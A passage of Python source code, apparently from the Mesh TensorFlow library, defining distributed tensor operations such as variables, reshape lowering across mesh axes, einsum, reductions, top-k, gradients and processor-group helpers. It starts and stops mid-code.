reshape(import_tf_tensor(\n mesh, tf_tensor, anonymous_shape(shape), name), shape)\n\n\nclass Variable(Operation):\n \"\"\"Variable.\"\"\"\n\n def __init__(self, mesh, name, shape, dtype, initializer,\n trainable, **kwargs):\n super(Variable, self).__init__([], mesh, name=\"name_will_be_set_later\")\n self._trainable = trainable\n with tf.device(\"cpu:0\"), mtf_utils.outside_all_rewrites():\n self.master = tf.get_variable(\n name, shape.to_integer_list, dtype=dtype, initializer=initializer,\n **kwargs)\n self._name = self.master.name[:self.master.name.find(\":\")]\n self._outputs = [Tensor(self, shape, dtype)]\n self.graph.all_variables.append(self)\n if trainable:\n self.graph.trainable_variables.append(self)\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n with mtf_utils.outside_all_rewrites():\n sv = mesh_impl.LaidOutVariable(self, mesh_impl)\n lowering.variables[self] = sv\n lowering.set_tensor_lowering(self.outputs[0], sv.laid_out_tensor)\n if self._trainable:\n lowering.add_counter(\"variables/trainable\", self.outputs[0].size)\n else:\n lowering.add_counter(\"variables/untrainable\", self.outputs[0].size)\n\n @property\n def value(self):\n return self.outputs[0]\n\n @property\n def shape(self):\n return self.value.shape\n\n @property\n def dtype(self):\n return self.value.dtype\n\n\ndef get_variable(mesh, name, shape, dtype=tf.float32,\n initializer=None, trainable=True,\n activation_dtype=None, **kwargs):\n ret = Variable(\n mesh, name, convert_to_shape(shape), dtype, initializer,\n trainable, **kwargs).outputs[0]\n if activation_dtype and activation_dtype != dtype:\n ret = cast(ret, activation_dtype)\n return ret\n\n\nclass Assign(Operation):\n \"\"\"Assign to a variable.\"\"\"\n\n def __init__(self, var, new_val, name=None):\n super(Assign, self).__init__([new_val], var.mesh, name=name or \"assign\")\n self._var = var\n self._outputs = []\n\n def lower(self, lowering):\n lowering.operations[self] = lowering.variables[self._var].assign_to_slices(\n lowering.tensors[self.inputs[0]].to_laid_out_tensor().all_slices)\n\n\ndef assign(var, new_val):\n \"\"\"Assign a new value to a variable.\n\n Args:\n var: either a Variable operation or its output Tensor.\n new_val: a Tensor\n Returns:\n an Operation\n Raises:\n ValueError: if var is not a Variable and var.operation is not a Variable\n \"\"\"\n if isinstance(var, Tensor):\n var = var.operation\n if not isinstance(var, Variable):\n raise ValueError(\"var must be a mtf.Variable or its output Tensor.\")\n return Assign(var, new_val)\n\n\nclass Depend(Operation):\n \"\"\"Control dependency.\"\"\"\n\n def __init__(self, x, dependencies, name=None):\n super(Depend, self).__init__([x], x.mesh, name=name or \"depend\")\n for d in dependencies:\n if not isinstance(d, Operation):\n raise ValueError(\"dependencies must be mtf.Operations. got %s\" % d)\n self._dependencies = dependencies\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n if not mesh_impl.supports_control_dependencies:\n raise ValueError(\"Mesh does not suppport control dependencies.\")\n with tf.control_dependencies(\n [lowering.operations[d] for d in self._dependencies]):\n lowering.set_tensor_lowering(\n self.outputs[0],\n mesh_impl.slicewise(tf.identity,\n lowering.tensors[self.inputs[0]]))\n\n def gradient(self, grad_ys):\n return grad_ys\n\n\ndef depend(x, dependencies):\n \"\"\"Identity of Tensor x that dependes on operations dependencies.\n\n Args:\n x: a Tensor\n dependencies: a list of Operations\n Returns:\n an tensor\n \"\"\"\n return Depend(x, dependencies).outputs[0]\n\n\nclass Constant(Operation):\n \"\"\"A tensor where every element is the same constant value.\"\"\"\n\n def __init__(self, mesh, value, shape, dtype, name=None):\n super(Constant, self).__init__([], mesh, name=name or \"constant\")\n self._outputs = [Tensor(self, shape, dtype)]\n self._value = value\n\n def lower(self, lowering):\n mesh_impl = lowering.mesh_impl(self)\n slice_shape = mesh_impl.slice_shape(self.outputs[0].shape)\n def tf_fn():\n return tf.constant(value=self._value,\n dtype=self.outputs[0].dtype,\n shape=slice_shape)\n lowering.set_tensor_lowering(self.outputs[0], mesh_impl.slicewise(tf_fn))\n\n\ndef constant(mesh, value, shape=None, dtype=tf.float32):\n shape = convert_to_shape(shape)\n return Constant(mesh, value,\n shape if shape is not None else Shape([]),\n dtype).outputs[0]\n\n\ndef zeros(mesh, shape, dtype=tf.float32):\n return constant(mesh, 0, shape=convert_to_shape(shape), dtype=dtype)\n\n\ndef zeros_like(t):\n return zeros(t.mesh, t.shape, dtype=t.dtype)\n\n\nclass StopGradient(Operation):\n \"\"\"Similar to tf.stop_gradient.\"\"\"\n\n def __init__(self, x, name=None):\n super(StopGradient, self).__init__(\n [x], x.mesh, name=name or \"stop_gradient\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(self.outputs[0],\n lowering.tensors[self.inputs[0]])\n\n @property\n def has_gradient(self):\n return False\n\n\ndef stop_gradient(x):\n return StopGradient(x).outputs[0]\n\n\nclass PrintOperation(Operation):\n \"\"\"Similar to tf.stop_gradient.\"\"\"\n\n def __init__(self, x, data, message, name=None, **kwargs):\n super(PrintOperation, self).__init__(\n [x], x.mesh, name=name or \"Print\")\n self._outputs = [Tensor(self, x.shape, x.dtype)]\n self._data = data\n self._message = message\n self._kwargs = kwargs\n\n def lower(self, lowering):\n lowering.set_tensor_lowering(\n self.outputs[0],\n lowering.mesh_impl(self).Print(\n lowering.tensors[self.inputs[0]],\n [lowering.tensors[d].to_laid_out_tensor() for d in self._data],\n self._message, **self._kwargs))\n\n def gradient(self, grad_ys):\n return grad_ys\n\n\ndef Print(x, data, message, **kwargs): # pylint: disable=invalid-name\n \"\"\"Call tf.Print.\n\n Args:\n x: a Tensor.\n data: a list of Tensor\n message: a string\n **kwargs: keyword arguments to tf.Print\n Returns:\n a Tensor which is identical in value to x\n \"\"\"\n return PrintOperation(x, data, message, **kwargs).outputs[0]\n\n\nclass ReshapeOperation(Operation):\n \"\"\"Similar to tf.stop_gradient.\"\"\"\n\n def __init__(self, x, new_shape, name=None):\n super(ReshapeOperation, self).__init__([x], x.mesh, name=name or \"reshape\")\n self._outputs = [Tensor(self, new_shape, x.dtype)]\n\n def lower(self, lowering):\n \"\"\"Lower the ReshapeOperation.\n\n Reshaping can require collective communication between processors.\n We haven't yet implemented all possible reshapes. We try to handle the\n common cases here - otherwise we raise a NotImplementedError.\n\n Args:\n lowering: a Lowering\n Raises:\n NotImplementedError: if we haven't covered this case\n \"\"\"\n old_shape = self.inputs[0].shape\n new_shape = self.outputs[0].shape\n mesh_impl = lowering.mesh_impl(self)\n slices = lowering.tensors[self.inputs[0]]\n\n mesh_axis_to_cumprod_old = mesh_impl.mesh_axis_to_cumprod(old_shape)\n mesh_axis_to_cumprod_new = mesh_impl.mesh_axis_to_cumprod(new_shape)\n # Figure out what needs to be done for different mesh-axes\n mesh_axes_allsplit = []\n mesh_axes_allconcat = []\n mesh_axes_alltoall = []\n for mesh_axis, (old_cumprod, new_cumprod) in enumerate(\n zip(mesh_axis_to_cumprod_old, mesh_axis_to_cumprod_new)):\n if new_cumprod != old_cumprod:\n if old_cumprod is None:\n # split in new layout but not in old layout - we need an allsplit\n mesh_axes_allsplit.append(mesh_axis)\n elif new_cumprod is None:\n # split in old layout but not in new layout - we need an allconcat\n mesh_axes_allconcat.append(mesh_axis)\n else:\n # split differently in old and new layouts - we need an alltoall\n mesh_axes_alltoall.append(mesh_axis)\n\n laid_out_size = mesh_impl.laid_out_size(old_shape)\n\n for mesh_axis in mesh_axes_allsplit:\n tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_new[mesh_axis])\n if tensor_axis is None:\n # TODO(noam): try to handle this case\n raise NotImplementedError(\n \"Try first reshaping to insert a new tf dimension,\"\n \" then changing layout.\")\n slices = mesh_impl.allsplit(slices, mesh_axis, tensor_axis)\n laid_out_size //= mesh_impl.shape[mesh_axis].size\n for mesh_axis in mesh_axes_alltoall:\n split_tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_new[mesh_axis])\n if split_tensor_axis is None:\n # TODO(noam): try to handle this case\n raise NotImplementedError(\n \"Try first reshaping to insert a new tf dimension,\"\n \" then changing layout.\")\n concat_tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_old[mesh_axis])\n assert concat_tensor_axis is not None\n slices = mesh_impl.alltoall(\n slices, mesh_axis, split_tensor_axis, concat_tensor_axis)\n lowering.add_counter(\n \"alltoall/%s/reshape_op\" % mesh_axis, laid_out_size)\n\n for mesh_axis in mesh_axes_allconcat:\n tensor_axis = old_shape.cumprod_to_tensor_axis(\n mesh_axis_to_cumprod_old[mesh_axis])\n assert tensor_axis is not None\n slices = mesh_impl.allconcat(slices, mesh_axis, tensor_axis)\n laid_out_size *= mesh_impl.shape[mesh_axis].size\n lowering.add_counter(\n \"allconcat/%s/reshape_op\" % mesh_axis, laid_out_size)\n # now reshape the slices\n old_slice_shape = mesh_impl.slice_shape(old_shape)\n new_slice_shape = mesh_impl.slice_shape(new_shape)\n if new_slice_shape != old_slice_shape:\n def reshape_fn(x):\n return tf.reshape(x, new_slice_shape)\n slices = mesh_impl.slicewise(reshape_fn, slices)\n lowering.set_tensor_lowering(self.outputs[0], slices)\n\n def gradient(self, grad_ys):\n return [reshape(grad_ys[0], self.inputs[0].shape)]\n\n\ndef reshape(x, new_shape):\n return ReshapeOperation(x, convert_to_shape(new_shape)).outputs[0]\n\n\ndef rename_dimension(x, old_name, new_name):\n \"\"\"Reshape a Tensor, renaming one dimension.\n\n Args:\n x: a Tensor\n old_name: a string\n new_name: a string\n\n Returns:\n a Tensor\n \"\"\"\n return reshape(x, x.shape.rename_dimension(old_name, new_name))\n\n\ndef einsum(xs, output_shape=None, name=None):\n \"\"\"Einstein summation.\n\n If output_shape is not specified and there are two inputs, reduce over\n all common dimensions and default the output shape to the unique dimensions\n of the first input followed by the unique dimensions of the second input.\n\n Args:\n xs: a list of Tensors\n output_shape: an optional Shape.\n name: an optional string\n Returns:\n a Tensor\n Raises:\n ValueError: if the output shape cannot be inferred\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if output_shape is None:\n if len(xs) == 2:\n output_shape = Shape(\n [d for d in xs[0].shape.dims if d not in xs[1].shape.dims] +\n [d for d in xs[1].shape.dims if d not in xs[0].shape.dims])\n else:\n raise ValueError(\"could not infer einsum output_shape for inputs %s\" %\n [x.to_string for x in xs])\n return EinsumOperation(xs, output_shape, name=name).outputs[0]\n\n\ndef matmul(a, b, output_shape=None, name=None):\n return einsum([a, b], output_shape=output_shape, name=name)\n\n\ndef _reduction_output_shape(x, output_shape, reduced_dim):\n \"\"\"Helper function to reduce_sum, etc.\"\"\"\n if output_shape is None:\n if reduced_dim is None:\n return Shape([])\n else:\n if reduced_dim not in x.shape.dims:\n raise ValueError(\n \"reduced_dim=%s not in x.shape.dims=%s\" % (reduced_dim, x.shape))\n return x.shape - reduced_dim\n elif reduced_dim is not None:\n raise ValueError(\"do not specify both reduced_dim and output_shape\")\n else:\n return output_shape\n\n\ndef reduce_sum(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n If reduced_dim is present, then only that dimension is reduced out.\n Alternatively, specify output_shape.\n Do not specify both reduced_dim and output_shape.\n If neither is specified, then all dimensions are reduced out.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. Must be a subsequence of x.shape.\n reduced_dim: a mtf.Dimension\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n if output_shape == x.shape:\n return x\n return ReduceOperation(x, output_shape, \"SUM\", name=name).outputs[0]\n\n\ndef reduce_mean(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n If reduced_dim is present, then only that dimension is reduced out.\n Alternatively, specify output_shape.\n Do not specify both reduced_dim and output_shape.\n If neither is specified, then all dimensions are reduced out.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. Must be a subsequence of x.shape.\n reduced_dim: a mtf.Dimension\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n with tf.variable_scope(name, default_name=\"reduce_mean\"):\n if output_shape == x.shape:\n return x\n return reduce_sum(\n x, output_shape=output_shape) * (output_shape.size / x.shape.size)\n\n\ndef reduce_max(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. Must be a subsequence of x.shape.\n reduced_dim: an optional Dimension\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n if output_shape is None:\n output_shape = Shape([])\n if output_shape == x.shape:\n return x\n return ReduceOperation(\n x, output_shape, \"MAX\", name=name or \"reduce_max\").outputs[0]\n\n\ndef reduce_min(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n \"\"\"Reduction on 1 or more axes.\n\n Args:\n x: a Tensor\n disable_positional_args: None\n output_shape: an optional Shape. Must be a subsequence of x.shape.\n reduced_dim: an optional Dimension\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n assert disable_positional_args is None\n output_shape = _reduction_output_shape(x, output_shape, reduced_dim)\n if output_shape is None:\n output_shape = Shape([])\n if output_shape == x.shape:\n return x\n return ReduceOperation(\n x, output_shape, \"MIN\", name=name or \"reduce_min\").outputs[0]\n\n\ndef reduce_all(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n return cast(reduce_min(to_float(x),\n disable_positional_args=disable_positional_args,\n output_shape=output_shape,\n reduced_dim=reduced_dim,\n name=name or \"reduce_all\"), tf.bool)\n\n\ndef reduce_any(x,\n disable_positional_args=None,\n output_shape=None,\n reduced_dim=None,\n name=None):\n output_shape = convert_to_shape(output_shape)\n reduced_dim = convert_to_dimension(reduced_dim)\n return cast(reduce_max(to_float(x),\n disable_positional_args=disable_positional_args,\n output_shape=output_shape,\n reduced_dim=reduced_dim,\n name=name or \"reduce_any\"), tf.bool)\n\n\ndef top_1(x, reduced_dim, dtype=tf.int32, name=None):\n \"\"\"Argmax and Max.\n\n Args:\n x: a Tensor\n reduced_dim: a Dimension in x.shape.dims\n dtype: a tf.dtype (for the output)\n name: an optional string\n Returns:\n indices: a Tensor with given dtype\n values: optional Tensor equal to mtf.reduce_max(x, reduced_dim=reduced_dim)\n \"\"\"\n reduced_dim = convert_to_dimension(reduced_dim)\n with tf.name_scope(name, default_name=\"top_1\"):\n max_val = reduce_max(x, reduced_dim=reduced_dim)\n is_max = to_float(equal(x, max_val))\n pos = range(x.mesh, reduced_dim, tf.float32)\n ret = reduce_max(is_max * pos, reduced_dim=reduced_dim)\n ret = cast(ret, dtype)\n return ret, max_val\n\n\ndef argmax(x, reduced_dim, dtype=tf.int32, name=None):\n reduced_dim = convert_to_dimension(reduced_dim)\n return top_1(x, reduced_dim, dtype, name)[0]\n\n\ndef top_k(x, reduced_dim, new_dim, dtype=tf.int32, name=None):\n \"\"\"Like tf.top_k.\n\n This operation returns two tensors with the same shape. The output shape\n is identical to the shape of x, except that reduced_dim is replaced by\n new_dim.\n\n Args:\n x: a Tensor\n reduced_dim: a Dimension in x.shape.dims.\n new_dim: a Dimension. The size determines k.\n dtype: optional dtype for indices.\n name: optional string.\n Returns:\n indices: a Tensor with given dtype.\n values: a Tensor with same type as x.\n \"\"\"\n reduced_dim = convert_to_dimension(reduced_dim)\n new_dim = convert_to_dimension(new_dim)\n indices = []\n values = []\n k = new_dim.size\n with tf.name_scope(name, default_name=\"top_k\"):\n for i in xrange(k):\n max_index, max_val = top_1(x, reduced_dim, dtype)\n indices.append(max_index)\n values.append(max_val)\n if i + 1 < k:\n x += one_hot(max_index, reduced_dim, on_value=-1e9)\n axis = x.shape.dims.index(reduced_dim)\n return stack(indices, new_dim.name, axis), stack(values, new_dim.name, axis)\n\n\ndef sample_with_temperature(x, dim, temperature=1.0, dtype=tf.int32, name=None):\n dim = convert_to_dimension(dim)\n with tf.name_scope(name, default_name=\"sample_with_temperature\"):\n if temperature != 0.0:\n # gumbel trick\n g = -log(-log(random_uniform(x.mesh, x.shape, dtype=x.dtype)))\n x += g * temperature\n return argmax(x, dim, dtype, name)\n\n\ndef add(x1, x2, output_shape=None, name=None):\n \"\"\"Binary addition with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if not isinstance(x2, Tensor):\n return ScalarAddOperation(x1, x2).outputs[0]\n with tf.name_scope(name, default_name=\"add\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return AddOperation(\n x1, x2, output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape)).outputs[0]\n\n\ndef sub(x1, x2, output_shape=None, name=None):\n \"\"\"Binary subtraction with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if not isinstance(x2, Tensor):\n return ScalarAddOperation(x1, -x2).outputs[0]\n with tf.name_scope(name, default_name=\"sub\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return add(x1, negative(x2), output_shape=output_shape)\n\n\ndef multiply(x1, x2, output_shape=None, name=None):\n \"\"\"Binary multiplication with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n if not isinstance(x2, Tensor):\n return ScalarMultiplyOperation(x1, x2).outputs[0]\n with tf.name_scope(name, default_name=\"mul\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return einsum(\n [x1, x2],\n output_shape=_infer_binary_broadcast_shape(\n x1.shape, x2.shape, output_shape))\n\n\ndef divide(x1, x2, output_shape=None, name=None):\n \"\"\"Binary division with broadcsting.\n\n Args:\n x1: a Tensor\n x2: a Tensor\n output_shape: an optional Shape\n name: an optional string\n Returns:\n a Tensor\n \"\"\"\n output_shape = convert_to_shape(output_shape)\n if not isinstance(x2, Tensor):\n return ScalarMultiplyOperation(x1, 1.0 / x2).outputs[0]\n with tf.name_scope(name, default_name=\"divide\"):\n x1, x2 = binary_arguments_to_tensors(x1, x2)\n return multiply(x1, reciprocal(x2), output_shape=output_shape)\n\n\ndef slice(x, begin, size, slice_dim_name, name=None): # pylint: disable=redefined-builtin\n \"\"\"Slice operation.\n\n Args:\n x: a list of Tensors\n begin: integer, where to begin slicing from along the axis\n size: integer, size to slice from axis.\n slice_dim_name: string, dimension name of slicing axis.\n name: an optional string\n Returns:\n a Tensor with shape extended by output_shape for the last axis.\n \"\"\"\n return SliceOperation(\n x, begin, size, slice_dim_name, name=name).outputs[0]\n\n\ndef pad(x, paddings, dim_name, name=None):\n \"\"\"Slice operation.\n\n Args:\n x: a list of Tensors\n paddings: list of integers of size 2, padding size before and after for dim.\n dim_name: string, name for the padding dim\n name: an optional string\n Returns:\n a Tensor with shape extended by output_shape for the last axis.\n \"\"\"\n return PadOperation(\n x, paddings, dim_name, name=name).outputs[0]\n\n\ndef one_hot(indices, output_dim, on_value=1.0,\n off_value=0.0, dtype=tf.float32, name=None):\n \"\"\"One hot operation.\n\n Args:\n indices: a Tensor\n output_dim: a Dimension\n on_value: Value taken when indices are on at a location, default 1\n off_value: Value taken when indices are off at a location, default 0\n dtype: a tf.DType\n name: an optional string\n Returns:\n a Tensor with shape extended by output_dim for the last axis.\n \"\"\"\n return OneHotOperation(\n indices, output_dim, on_value, off_value, dtype, name=name).outputs[0]\n\n\ndef gather(weights, indices, dim, output_shape=None):\n \"\"\"Shorthand for einsum([one_hot(indices, dim)], weights).\n\n Args:\n weights: a Tensor\n indices: a Tensor with integer type\n dim: a Dimension\n output_shape: an optional mtf.Shape\n Returns:\n a Tensor\n \"\"\"\n dim = convert_to_dimension(dim)\n output_shape = convert_to_shape(output_shape)\n if weights.dtype == tf.bool:\n return cast(gather(to_float(weights), indices, dim, output_shape), tf.bool)\n return einsum([one_hot(indices, dim, dtype=weights.dtype), weights],\n output_shape=output_shape)\n\n\ndef gradients(ys, xs, grad_ys=None):\n \"\"\"Compute gradients in dtf.\n\n Args:\n ys: a list of Tensors\n xs: a list of Tensors\n grad_ys: an optional list of Tensors\n\n Returns:\n grad_xs: a list of Tensors\n \"\"\"\n graph = ys[0].graph\n if not grad_ys:\n grad_ys = [Constant(y.mesh, 1.0, y.shape, y.dtype).outputs[0] for y in ys]\n # figure out what Tensors are downstream of xs\n downstream = set(xs)\n for op in graph.operations:\n if op.has_gradient:\n if set(op.inputs) & downstream:\n downstream |= set(op.outputs)\n tensor_to_gradient = dict(zip(ys, grad_ys))\n for op in graph.operations[::-1]:\n grad_outputs = [tensor_to_gradient.get(out) for out in op.outputs]\n if op.has_gradient and any(grad_outputs) and (set(op.inputs) & downstream):\n with tf.variable_scope(op.name + \"/gradients\"):\n input_grads = op.gradient(grad_outputs)\n for inp, grad in zip(op.inputs, input_grads):\n if inp in downstream and grad is not None:\n if inp in tensor_to_gradient:\n tensor_to_gradient[inp] += grad\n else:\n tensor_to_gradient[inp] = grad\n return [tensor_to_gradient.get(x, None) for x in xs]\n\n\ndef _infer_binary_broadcast_shape(shape1, shape2, given_output_shape=None):\n \"\"\"Infer shape of the output of a binary op with broadcasting.\n\n If the output shape is not given with given_output_shape, then we check\n to see if one of the shapes is a subsequence of the other one, and we\n return the one that is the supersequence. Otherwise, we list the dimensions\n of shape1, followed by all new dimensions in shape2.\n\n Args:\n shape1: a Shape\n shape2: a Shape\n given_output_shape: an optional Shape\n Returns:\n a Shape\n \"\"\"\n shape1 = convert_to_shape(shape1)\n shape2 = convert_to_shape(shape2)\n given_output_shape = convert_to_shape(given_output_shape)\n if given_output_shape is not None:\n return given_output_shape\n if is_subsequence(shape1.dims, shape2.dims):\n return shape2\n if is_subsequence(shape2.dims, shape1.dims):\n return shape1\n return Shape(\n shape1.dims + [d for d in shape2.dims if d not in shape1.dims])\n\n\ndef _expand_dims(x, input_shape, output_shape):\n \"\"\"Expand dimensions and transpose if necessary.\n\n Args:\n x: a tf.Tensor\n input_shape: a Shape\n output_shape: a Shape whose dimensions are a superset of\n those in input_shape\n\n Returns:\n a tf.Tensor\n \"\"\"\n verify_no_new_dims([output_shape], input_shape)\n if input_shape == output_shape or input_shape.ndims == 0:\n return x\n perm = [input_shape.dims.index(d) for d in output_shape.dims\n if d in input_shape.dims]\n x = tf.transpose(x, perm)\n for i, d in enumerate(output_shape.dims):\n if d not in input_shape.dims:\n x = tf.expand_dims(x, i)\n return x\n\n\ndef _einsum_equation(input_shapes, output_shape):\n \"\"\"Turn shapes into an einsum equation.\n\n e.g. \"ij,jk->ik\"\n\n Args:\n input_shapes: a list of Shapes\n output_shape: a Shape\n Returns:\n a string\n \"\"\"\n ret = []\n next_letter = ord(\"a\")\n dim_to_letter = {}\n for shape_num, shape in enumerate(input_shapes + [output_shape]):\n if shape_num == len(input_shapes):\n ret.append(\"->\")\n elif shape_num > 0:\n ret.append(\",\")\n for d in shape.dims:\n if d not in dim_to_letter:\n dim_to_letter[d] = chr(next_letter)\n next_letter += 1\n ret.append(dim_to_letter[d])\n\n return \"\".join(ret)\n\n\ndef is_subsequence(short_seq, long_seq):\n \"\"\"Is short_seq a subsequence of long_seq.\"\"\"\n if not short_seq:\n return True\n pos = 0\n for x in long_seq:\n if pos == len(short_seq):\n return True\n if short_seq[pos] == x:\n pos += 1\n if pos == len(short_seq):\n return True\n return False\n\n\ndef verify_no_new_dims(input_shapes, output_shape):\n \"\"\"Verifies that all dimensions in the output are in at least one input.\n\n Args:\n input_shapes: a list of Shapes\n output_shape: a Shape\n Raises:\n ValueError: if there are new dimensions in the output.\n \"\"\"\n all_input_dims = set(sum([s.dims for s in input_shapes], []))\n all_output_dims = set(output_shape.dims)\n if not all_output_dims.issubset(all_input_dims):\n raise ValueError(\n \"No new dimensions allowed in output\"\n \" input_shapes = %s output_shape= %s\"\n % ([s.dims for s in input_shapes], output_shape.dims))\n\n\ndef pnum_to_processor_coordinates(mesh_shape, pnum):\n \"\"\"Coordinates of a processor in the mesh.\n\n Args:\n mesh_shape: a Shape\n pnum: an integer less than len(mesh_shape)\n\n Returns:\n a list of integers with length len(mesh_shape)\n \"\"\"\n ret = []\n for dimsize in mesh_shape.to_integer_list[::-1]:\n ret.append(pnum % dimsize)\n pnum //= dimsize\n return ret[::-1]\n\n\ndef processor_coordinates_to_pnum(mesh_shape, coord):\n \"\"\"Inverse of pnum_to_processor_coordinates.\n\n Args:\n mesh_shape: a Shape\n coord: a list of integers with length len(mesh_shape)\n\n Returns:\n an integer less than len(mesh_shape)\n \"\"\"\n ret = 0\n multiplier = 1\n for c, d in zip(coord[::-1], mesh_shape.to_integer_list[::-1]):\n ret += multiplier * c\n multiplier *= d\n return ret\n\n\ndef pnum_to_group(mesh_shape, group_dims, pnum):\n \"\"\"Group number for grouped allreduce.\n\n Args:\n mesh_shape: a Shape\n group_dims: a list of integers (the dimensions reduced over)\n pnum: an integer\n\n Returns:\n an integer\n \"\"\"\n coord = pnum_to_processor_coordinates(mesh_shape, pnum)\n remaining_shape = Shape(\n [d for i, d in enumerate(mesh_shape) if i not in group_dims])\n remaining_coord = [d for i, d in enumerate(coord) if i not in group_dims]\n return processor_coordinates_to_pnum(remaining_shape, remaining_coord)\n\n\ndef processor_groups(mesh_shape, group_dims):\n \"\"\"Groups of processors which differ only in the given dimensions.\n\n Args:\n mesh_shape: a Shape\n group_dims: a list of integers\n\n Returns:\n a list of lists of integers (processor numbers)\n \"\"\"\n group_numbers = [\n pnum_to_group(mesh_shape, group_dims, pnum)\n for pnum in xrange(mesh_shape.size)]\n ret = []\n for pnum, g in enumerate(group_numbers):\n while len(ret) <= g:\n ret.append([])\n ret[g].append(pnum)\n return ret\n\n\ndef list_product(l):\n return reduce(mul, l, 1)\n\n\ndef log_softmax(x, reduced_dim, name=None):\n \"\"\"log(softmax(x)).\n\n Args:\n x: a Tensor whose shape contains vocab_dim\n reduced_dim: a Dimension\n name: an optional string\n\n Returns:\n a Tensor with the same shape as x\n \"\"\"\n reduced_dim = convert_to_dimension(reduced_dim)\n with tf.variable_scope(name, default_name=\"log_softmax\"):\n reduced_shape = x.shape - reduced_dim\n max_logit = reduce_max(stop_gradient(x), output_shape=reduced_shape)\n x -= max_logit\n exp_x = exp(x)\n sum_exp_x = reduce_sum(exp_x, output_shape=reduced_shape)\n log_denom = log(sum_exp_x)\n return x - log_denom\n\n\ndef softmax(x, reduced_dim, name=None):\n with tf.variable_scope(name, default_name=\"softmax\"):\n return exp(log_softmax(x, reduced_dim))\n\n\ndef range(mesh, dim, dtype, name=None): # pylint: disable=redefined-builtin\n \"\"\"Create a 1d mesh tensor with a range from [0, dim.size).\n\n Args:\n mesh: a Mesh\n dim: a Dimension\n dtype: a tf.DType\n name: an optional string\n\n Returns:\n a Tensor\n \"\"\"\n dim = convert_to_dimension(dim)\n with tf.variable_scope(name, default_name=\"range\"):\n return import_tf_tensor(\n mesh, tf.range(dim.size, dtype=dtype), shape=Shape([dim]))\n\n\ndef pretty_print_counters(counters):\n \"\"\"print counters hierarchically.\n\n Each counter is a pair of a string and a number.\n The string can have slashes, meaning that the number also counts towards\n each prefix. e.g. \"parameters/trainable\" counts towards both \"parameters\"\n and \"parameters/trainable\".\n\n Args:\n counters: a list of (string, number) pairs\n\n Returns:\n a string\n \"\"\"\n totals = collections.defaultdict(int)\n for (name, val) in counters:\n prefixes = [name[:i] for i in xrange(len(name)) if name[i] == \"/\"] + [name]\n for p in prefixes:\n totals[p] += val\n parts = []\n for name, val in sorted(six.iteritems(totals)):\n parts.append(\" \" * name.count(\"/\") + \"%s: %.3g\" % (name, val))\n return \"\\n\".join(parts)\n\n\ndef _parse_string_to_list_of_pairs(s, seconds_to_int=False):\n r\"\"\"Parses a string into a list of pairs.\n\n In the input string, each pair is separated by a colon, and the delimiters\n between pairs are any of \" ,.;\".\n\n e.g. \"rows:32,cols:32\"\n\n Args:\n s: str to parse.\n seconds_to_int: Boolean. If True, then the second elements are returned\n as integers; otherwise they are strings.\n\n Returns:\n List of tuple pairs.\n\n Raises:\n ValueError: Badly formatted string.\n \"\"\"\n ret = []\n for p in [s.split(\":\") for s in re.sub(\"[,.;]\", \" \", s).split()]:\n if len(p) != 2:\n raise ValueError(\"bad input to _parse_string_to_list_of_pairs %s\" % s)\n if seconds_to_int:\n ret.append((p[0], int(p[1])))\n else:\n ret.append(tuple(p))\n return ret\n\n\ndef parallel(devices, fn, *args, **kwargs):\n \"\"\"Call a function once on each device.\n\n Args:\n devices: a list of n devices\n fn: a function\n *args: arguments, each of which is a list of length n\n **kwargs: keyword-args, each of which is a list of length n\n Returns:\n a list of length n\n Raises:\n ValueError: if the arguments are not all lists of length n\n \"\"\"\n if not isinstance(devices, list):\n raise ValueError(\"devices must be a list\")\n for x in list(args) + 